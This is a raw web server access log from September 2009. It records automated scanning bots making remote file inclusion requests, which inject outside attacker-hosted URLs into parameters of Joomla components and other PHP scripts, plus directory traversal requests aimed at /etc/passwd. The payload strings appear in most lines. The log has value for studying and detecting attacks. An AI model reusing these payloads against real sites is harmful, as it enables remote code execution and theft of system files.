78.111.80.234 - - [04/Sep/2009:00:50:42 -0400] "GET /logs/access_log.Q109070500%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:50:42 -0400] "GET /logs/access_log.Q109080900%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:00:52:01 -0400] "GET /logs/access_log.Q109072900/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:00:52:02 -0400] "GET /?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:00:52:02 -0400] "GET /logs/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 200 16426 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:00:52:23 -0400] "GET /logs/access_log.Q109072900/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:00:52:23 -0400] "GET /?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:00:52:23 -0400] "GET /logs/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 200 16426 "-" "libwww-perl/5.65"
74.50.85.104 - - [04/Sep/2009:00:52:32 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
203.126.23.51 - - [04/Sep/2009:00:53:36 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.126.23.51 - - [04/Sep/2009:00:53:37 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:54:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.136.251 - - [04/Sep/2009:00:54:21 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:21 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:21 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:24 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:24 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:24 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:35 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:35 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:35 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:38 -0400] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:39 -0400] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:00:54:46 -0400] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
208.109.108.135 - - [04/Sep/2009:00:55:33 -0400] "GET /?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
208.109.108.135 - - [04/Sep/2009:00:55:33 -0400] "GET /logs/access_log.Q109051700/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
208.109.108.135 - - [04/Sep/2009:00:55:33 -0400] "GET /logs/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 200 16426 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
208.109.108.135 - - [04/Sep/2009:00:55:44 -0400] "GET /logs/access_log.Q109082500/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
222.236.47.188 - - [04/Sep/2009:00:55:46 -0400] "GET /logs/access_log.Q109070100/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:00:55:54 -0400] "GET /logs/access_log.Q109070100/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
218.104.188.3 - - [04/Sep/2009:00:56:11 -0400] "GET /index.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "-"
218.104.188.3 - - [04/Sep/2009:00:56:11 -0400] "GET /logs/index.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "-"
218.104.188.3 - - [04/Sep/2009:00:56:11 -0400] "GET /logs/access_log.Q109070700%20/index.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "-"
218.104.188.3 - - [04/Sep/2009:00:56:11 -0400] "GET /index.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "-"
218.104.188.3 - - [04/Sep/2009:00:56:11 -0400] "GET /logs/access_log.Q109070700%20/index.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 235 "-" "-"
218.104.188.3 - - [04/Sep/2009:00:56:12 -0400] "GET /logs/index.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "-"
91.194.10.126 - - [04/Sep/2009:00:56:18 -0400] "GET //board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:56:18 -0400] "GET /logs//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:56:18 -0400] "GET /logs/access_log.Q109071900%20%20//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:56:23 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:56:26 -0400] "GET /logs/access_log.Q109062000%20%20//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.109.108.135 - - [04/Sep/2009:00:56:32 -0400] "GET /logs/access_log.Q109080600/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.121.89.135 - - [04/Sep/2009:00:56:36 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:00:56:49 -0400] "GET /?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.72.216 - - [04/Sep/2009:00:56:49 -0400] "GET /logs/access_log.Q109051700/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.72.216 - - [04/Sep/2009:00:56:49 -0400] "GET /logs/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 200 16426 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
91.121.89.135 - - [04/Sep/2009:00:57:05 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:05 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:05 -0400] "GET /logs/access_log.Q109061000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:57:20 -0400] "GET /logs//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:57:20 -0400] "GET //board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:57:20 -0400] "GET /logs/access_log.Q109071900%20%20//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:00:57:20 -0400] "GET /logs/access_log.Q109062000%20%20//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:41 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:41 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:42 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:00:57:43 -0400] "GET /logs/access_log.Q109061000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:00:57:51 -0400] "GET /logs/access_log.Q109082500/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.72.216 - - [04/Sep/2009:00:58:08 -0400] "GET /logs/access_log.Q109080600/?_zb_path=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
77.222.131.59 - - [04/Sep/2009:00:58:41 -0400] "GET //board/view.php?bbs_id=http://hanarokorea.com/bbs/icon/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.222.131.59 - - [04/Sep/2009:00:58:41 -0400] "GET /logs//board/view.php?bbs_id=http://hanarokorea.com/bbs/icon/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
77.222.131.59 - - [04/Sep/2009:00:58:41 -0400] "GET /logs/access_log.Q109071900%20%20//board/view.php?bbs_id=http://hanarokorea.com/bbs/icon/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.222.131.59 - - [04/Sep/2009:00:58:51 -0400] "GET /logs/access_log.Q109062000%20%20//board/view.php?bbs_id=http://hanarokorea.com/bbs/icon/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:59:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.194.10.126 - - [04/Sep/2009:00:59:42 -0400] "GET /logs/access_log.Q109071900//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:01:00:52 -0400] "GET /logs/access_log.Q109062000//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:01:01:00 -0400] "GET /logs/error_log.Q109071800%20/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:01:01:02 -0400] "GET /logs/error_log.Q109071800%20/?DOCUMENT_ROOT=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
77.222.131.59 - - [04/Sep/2009:01:01:03 -0400] "GET /logs/access_log.Q109071900//board/view.php?bbs_id=http://hanarokorea.com/bbs/icon/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.222.131.59 - - [04/Sep/2009:01:01:04 -0400] "GET /logs/access_log.Q109062000//board/view.php?bbs_id=http://hanarokorea.com/bbs/icon/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:01:01:27 -0400] "GET /logs/access_log.Q109071900//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:01:01:31 -0400] "GET /logs/access_log.Q109062000//board/view.php?bbs_id=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:02:23 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:02:23 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:02:23 -0400] "GET /logs/access_log.Q109051600%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:02:36 -0400] "GET /logs/access_log.Q109061200%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:01:04:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [04/Sep/2009:01:04:15 -0400] "GET //atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:04:15 -0400] "GET /logs//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:04:16 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:04:17 -0400] "GET /logs/access_log.Q109081200//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
205.178.144.192 - - [04/Sep/2009:01:04:20 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.linguistix.ca//image.jpg?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
91.121.89.135 - - [04/Sep/2009:01:04:23 -0400] "GET //ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:04:23 -0400] "GET /logs/access_log.Q109080900%20%20//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:04:23 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:04:23 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:05:16 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:05:16 -0400] "GET /logs/access_log.Q109081200%20%20//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:06:31 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:06:31 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:06:31 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:06:49 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:06:49 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:01:06:36 -0400] "GET /logs/access_log.Q109081700 HTTP/1.0" 200 5323695 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
205.178.144.192 - - [04/Sep/2009:01:07:15 -0400] "GET /logs/access_log.Q109081000//modules/TotalCalendar/about.php?inc_dir=http://www.linguistix.ca//image.jpg?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
205.178.144.192 - - [04/Sep/2009:01:07:15 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.linguistix.ca//image.jpg?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
205.178.144.192 - - [04/Sep/2009:01:07:15 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.linguistix.ca//image.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
205.178.144.192 - - [04/Sep/2009:01:07:22 -0400] "GET /logs/error_log.Q109081000//modules/TotalCalendar/about.php?inc_dir=http://www.linguistix.ca//image.jpg?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
74.6.22.87 - - [04/Sep/2009:01:07:24 -0400] "GET /logs/access_log.Q108061200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.89.135 - - [04/Sep/2009:01:09:08 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:01:09:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [04/Sep/2009:01:09:18 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:39 -0400] "GET /logs//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:39 -0400] "GET //atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:39 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:40 -0400] "GET /logs/access_log.Q109081200%20%20//atom.php5?page=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:43 -0400] "GET //ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:44 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:45 -0400] "GET /logs/access_log.Q109080900%20%20//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:09:45 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.126.23.51 - - [04/Sep/2009:01:10:02 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:11:12 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:11:12 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:11:12 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:11:26 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:11:26 -0400] "GET /logs/access_log.Q109072900%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:01:11:26 -0400] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:01:11:53 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
